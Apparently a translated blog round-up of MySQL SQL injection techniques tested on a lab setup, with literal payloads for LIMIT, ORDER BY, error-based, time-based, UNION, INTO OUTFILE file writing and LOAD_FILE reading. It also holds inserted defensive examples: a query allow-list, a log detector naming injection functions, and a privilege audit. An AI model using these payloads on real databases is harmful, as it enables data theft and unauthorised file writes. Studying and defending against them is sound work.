
A round-up of the various injection techniques available under MySQL~
Test Machine Configuration

OS:MacOS Mojave 10.14.2
MySQL: MySQL 5.7.19-log

Test table structure: (screenshot of the test table; image not preserved)

limit

Emmmm, the test failed.
After going through a few articles, I found that analyse() after LIMIT only works on MySQL server version <= 5.6.6.

So I switched to Windows 7 x64 + MySQL 5.5.53.

Test statement

SELECT username FROM user LIMIT {$uid},3;

LIMIT injection is possible mainly because a PROCEDURE analyse() clause is allowed to follow the LIMIT clause.

Constructing an error-based injection

SELECT username FROM user  LIMIT 1,3 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

Because a SELECT cannot be used inside analyse() on version 5.5, only configuration information and the like can be obtained this way.

exp

SELECT username FROM user  LIMIT 1,3 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);

SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 1,1 PROCEDURE analyse((select extractvalue(rand(),concat(0x3a,(IF(MID(version(),1,1) LIKE 5, BENCHMARK(5000000,SHA1(1)),1))))),1)

order by

Test statement:

SELECT * FROM user order by uid {evil};

  1. Order by + error-based injection
  2. Order by + time-based blind injection
  3. Order by + UNION query

This injection must wrap the SQL statement in ().

  4. Order by + REGEXP blind injection

A quick explanation of the statement:
when the regex does not match any data, the result is 0, so the SQL statement is equivalent to

select * from user order by uid ^ 0;

The ordering is unchanged.
exp

SELECT * FROM user ORDER BY uid and extractvalue(1,concat(0x3a,user()));

SELECT * FROM user ORDER BY uid and updatexml(1,concat(0x3a,user()),1);

select * from user order by uid ^(select (select version()) regexp '^aaaaaa');

select * from user order by uid,(select 1 from (select sleep(3))a);

(select * from user order by uid) union (select 1,(select version()),3,4);
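The LIMIT and ORDER BY cases above share one root cause: the offset and the sort column are spliced into the statement as text, because neither position can be bound as a normal query parameter in most MySQL drivers. The following is an added example, not code from the original post, showing the application-side fix for both at once: an allow-list for the sort column and direction, and bounded integer coercion for the LIMIT values, which are then passed as bind parameters. The table name `user`, the column allow-list and the `%s` placeholder style (mysqlclient / PyMySQL) are assumptions for the illustration.

```python
# Added example (not from the original post): building ORDER BY and LIMIT
# safely in application code. Identifiers come only from an allow-list,
# LIMIT values are coerced to bounded ints and bound as parameters.
# The table/column names are assumptions for the illustration.

ALLOWED_SORT_COLUMNS = {"uid", "username", "city"}   # constructed allow-list
ALLOWED_DIRECTIONS = {"ASC", "DESC"}
MAX_PAGE_SIZE = 100


class UnsafeInput(ValueError):
    """Raised when request input does not match the allow-list or bounds."""


def build_user_query(sort_col, direction="ASC", offset=0, page_size=20):
    """Return (sql, params). Only allow-listed identifiers are interpolated;
    LIMIT values are coerced to bounded ints and passed as bind parameters."""
    if sort_col not in ALLOWED_SORT_COLUMNS:
        raise UnsafeInput(f"sort column not allowed: {sort_col!r}")
    direction = str(direction).upper()
    if direction not in ALLOWED_DIRECTIONS:
        raise UnsafeInput(f"sort direction not allowed: {direction!r}")
    try:
        # int() rejects anything like "1,3 procedure analyse(...)" outright
        offset = int(offset)
        page_size = int(page_size)
    except (TypeError, ValueError):
        raise UnsafeInput("offset and page_size must be integers") from None
    if offset < 0 or not (1 <= page_size <= MAX_PAGE_SIZE):
        raise UnsafeInput("offset or page_size out of range")
    # Identifier is quoted with backticks and taken from the allow-list only;
    # the two LIMIT values travel as %s bind parameters (mysqlclient/PyMySQL style).
    sql = f"SELECT uid, username FROM user ORDER BY `{sort_col}` {direction} LIMIT %s, %s"
    return sql, (offset, page_size)


def is_accepted(sort_col, direction="ASC", offset=0, page_size=20):
    """True if build_user_query would accept the input, False if it rejects it."""
    try:
        build_user_query(sort_col, direction, offset, page_size)
        return True
    except UnsafeInput:
        return False


if __name__ == "__main__":
    print(build_user_query("uid", "desc", 10, 20))
    # Both of the page's shapes are refused before any SQL is built:
    print(is_accepted("uid and extractvalue(1,concat(0x3a,user()))"))   # False
    print(is_accepted("uid", "ASC", "1,3 procedure analyse(1,1)"))       # False
```

The point of `is_accepted` is that rejection happens on the identifier and on the integer cast, not on a blocklist of function names: `uid ^ (...)`, `uid,(select ...)` and every other variant on the page fail the same membership test.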

from

Test statement

SELECT * FROM {$Tables};

Directly nest a subquery.

exp

Version restriction: Version <= 5.5.5
select exp(~(select*from(select user())x));

insert into users (id, username, password) values (2, '' ^ exp(~(select*from(select user())x)), 'patrilic');

ExtractValue

Select * from user where uid = 1 and (extractvalue('String',(select user())));

extractvalue(target file,xml path)


UpdateXml

Select * from user where uid = 1 and (updatexml('String',(Select user()),'String'));

updatexml(Target file,xml path,updateinfo)


name_const

Select * from user where uid = 1 and (select name_const(version(),1),name_const(version(),1));

name_const('1', 14)
Very limited in applicability.
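The error-based primitives in the sections above (extractvalue, updatexml, name_const, the exp() overflow, PROCEDURE analyse) all share a tell-tale shape in the server's query log, which makes them easy to spot on the defending side. The following is an added example, not code from the original post: a small parser for MySQL 5.7 general-log lines plus a rule set that flags those primitives (and the file functions from the later sections). The log lines are constructed samples built from the page's own statements; the rule names are my own.

```python
import re

# Added example (not from the original post): flagging the error-based
# injection primitives in MySQL general-log lines. The 5.7 general log
# format is "<time>\t<thread_id> <command>\t<argument>"; the sample lines
# below are constructed for the illustration.

# Each rule: (name, compiled regex). Case-insensitive, as MySQL function names are.
ERROR_BASED_RULES = [
    ("extractvalue", re.compile(r"\bextractvalue\s*\(", re.I)),
    ("updatexml", re.compile(r"\bupdatexml\s*\(", re.I)),
    ("name_const", re.compile(r"\bname_const\s*\(", re.I)),
    ("exp_overflow", re.compile(r"\bexp\s*\(\s*~", re.I)),
    ("procedure_analyse", re.compile(r"\bprocedure\s+analyse\s*\(", re.I)),
    ("file_function", re.compile(r"\b(load_file\s*\(|into\s+(out|dump)file\b)", re.I)),
]

LOG_LINE = re.compile(r"^(?P<time>\S+)\s+(?P<thread>\d+)\s+(?P<command>\w+)\s+(?P<arg>.*)$")


def parse_general_log_line(line):
    """Split one general-log line into its fields; None for lines that do not
    match (continuation lines of multi-line statements, file headers)."""
    m = LOG_LINE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def scan_general_log(lines):
    """Return one finding per (Query line, matching rule): thread id, rule, statement."""
    findings = []
    for line in lines:
        rec = parse_general_log_line(line)
        if rec is None or rec["command"] != "Query":
            continue      # Connect / Quit / Init DB lines carry no statement
        for name, pattern in ERROR_BASED_RULES:
            if pattern.search(rec["arg"]):
                findings.append({"thread": int(rec["thread"]), "rule": name, "statement": rec["arg"]})
    return findings


# Constructed sample: a connect line, one legitimate query, three of the page's payloads.
SAMPLE_LOG = [
    "2019-01-10T08:12:30.000001Z\t   12 Connect\tapp@localhost on shop using TCP/IP",
    "2019-01-10T08:12:31.000002Z\t   12 Query\tSELECT username FROM user LIMIT 0,3",
    "2019-01-10T08:12:33.000003Z\t   12 Query\tSELECT * FROM user WHERE uid = 1 and (extractvalue('String',(select user())))",
    "2019-01-10T08:12:34.000004Z\t   13 Query\tSELECT username FROM user LIMIT 1,3 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)",
    "2019-01-10T08:12:35.000005Z\t   13 Query\tselect exp(~(select*from(select user())x))",
]

if __name__ == "__main__":
    for f in scan_general_log(SAMPLE_LOG):
        print(f"thread {f['thread']}: {f['rule']}: {f['statement'][:60]}")
```

Against the constructed sample this yields four findings: the extractvalue probe on thread 12, and on thread 13 the LIMIT payload (matched by both the extractvalue and the procedure_analyse rule) plus the exp() overflow. A legitimate application rarely calls these functions from a web-facing query, so the false-positive rate of such rules is low; correlating by thread id, as done here, groups a whole probing session together.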

Integer overflow error-based injection

insert

Insert INTO user (uid,username,password,city) VALUES (?,?,?,?);


delete

DELETE FROM user WHERE uid={$uid};


update

UPDATE user SET password = {$password} Where username = {session.user} and uid = {session.uid}


into outfile

Main use: writing a shell
Requirements:

  • The user must have the FILE privilege
  • Files cannot be overwritten, so the target file must not already exist
  • If secure_file_priv is non-empty, files can only be written under that directory

into outfile + UNION

SELECT * FROM user WHERE uid = -1 union select 1,2,3,0x3c3f70687020706870696e666f28293b3f3e into outfile 'Y:/123.php';


into outfile + LINES TERMINATED BY (limit)

select * from user order by uid limit 1,1 into outfile 'Y:/123.php' LINES TERMINATED BY 0x3c3f70687020706870696e666f28293b3f3e;

into outfile + FIELDS TERMINATED BY (limit)

select * from user order by uid limit 1,1 into outfile 'Y:/123.php' fields terminated by  0x3c3f70687020706870696e666f28293b3f3e;

into outfile + LINES STARTING BY (limit)

select * from user order by uid limit 1,1 into outfile 'Y:/123.php' LINES STARTING BY 0x3c3f70687020706870696e666f28293b3f3e;

load_file

Main use: reading files
Requirements:

  • The user must have the FILE privilege
  • If secure_file_priv is non-empty, only files under that directory can be read
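The requirements listed for into outfile and for load_file are the same two server-side controls: the FILE privilege on the account and the secure_file_priv setting. Whether a given deployment is exposed can therefore be decided from the output of `SHOW VARIABLES LIKE 'secure_file_priv';` and `SHOW GRANTS FOR 'app'@'%';`. The following is an added example, not code from the original post, that turns those two outputs into a risk verdict; the grant strings, account name and directory path in it are constructed samples.

```python
import re

# Added example (not from the original post): deciding whether an account can
# use LOAD_FILE() / INTO OUTFILE / INTO DUMPFILE, from the values returned by
#   SHOW VARIABLES LIKE 'secure_file_priv';
#   SHOW GRANTS FOR 'app'@'%';
# Grant strings and variable values below are constructed samples.

GRANT_RE = re.compile(r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s", re.I)


def has_file_privilege(grants):
    """FILE is a global privilege: it can only be granted ON *.*, either
    explicitly or as part of ALL PRIVILEGES."""
    for g in grants:
        m = GRANT_RE.match(g.strip())
        if not m or m.group("scope") != "*.*":
            continue                       # database-scoped grants never carry FILE
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if "FILE" in privs or "ALL PRIVILEGES" in privs or "ALL" in privs:
            return True
    return False


def classify_secure_file_priv(value):
    """Map the secure_file_priv value to the file operations it allows.
    SHOW VARIABLES reports the disabled state as the string NULL."""
    if value is None or str(value).upper() == "NULL":
        return "disabled"                  # server refuses all file import/export
    if str(value).strip() == "":
        return "unrestricted"              # any directory the mysqld process can reach
    return "restricted"                    # only under the named directory


def assess_file_access(secure_file_priv, grants):
    """Combine both checks into one verdict for the account."""
    mode = classify_secure_file_priv(secure_file_priv)
    file_priv = has_file_privilege(grants)
    if not file_priv or mode == "disabled":
        risk = "none"
    elif mode == "unrestricted":
        risk = "high"                      # outfile/load_file anywhere mysqld can write or read
    else:
        risk = "limited"                   # confined to the secure_file_priv directory
    return {"secure_file_priv": mode, "file_privilege": file_priv, "risk": risk}


# Constructed samples: a least-privilege web account and an over-privileged one.
WEB_APP_GRANTS = ["GRANT SELECT, INSERT, UPDATE, DELETE ON `shop`.* TO 'app'@'%'"]
OVERPRIVILEGED_GRANTS = ["GRANT ALL PRIVILEGES ON *.* TO 'app'@'%'"]

if __name__ == "__main__":
    print(assess_file_access("", OVERPRIVILEGED_GRANTS))                        # risk: high
    print(assess_file_access("/var/lib/mysql-files/", OVERPRIVILEGED_GRANTS))   # risk: limited
    print(assess_file_access("", WEB_APP_GRANTS))                               # risk: none
```

The two mitigations fall straight out of the verdict: run the application as an account without FILE (database-scoped grants only), and set secure_file_priv to a dedicated directory or to NULL. Either one alone removes the "high" case; together they remove the entire section's file read/write techniques regardless of the injection point.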

load_file + UNION

select * from user where uid = -1 union select 1,2,3,(select load_file('Y:/123.php'));


load_file + updatexml

select * from user  where username = '' and updatexml(0,concat(0x7e,(LOAD_FILE('Y:/123.php')),0x7e),0);


load_file + extractvalue

select * from user where uid=-1 and (extractvalue(1,concat(0x7e,(select (LOAD_FILE('Y:/1.php'))),0x7e)));


load_file + isnull + updatexml

select * from user  where username = '' and updatexml(0,concat(0x7e,isnull(LOAD_FILE('D:/1.php')),0x7e),0);

File exists: returns 0
File does not exist: returns 1

Dumpfile

SELECT _utf8'Hello world!' INTO DUMPFILE 'Y:/world.php';


Injection without knowing the column names

It is better to read the original article; I am just reproducing it here. (Screenshots of the reproduction; images not preserved.)

Thanks

MySQLi Cookbook
lcamry’s blog
报错注入邂逅load_file&into outfile搭讪LINES (Error-based injection meets load_file & into outfile, and chats up LINES)
sqli-extracting-data-without-knowing-columns-name
wangyihang-sqli-labs-Script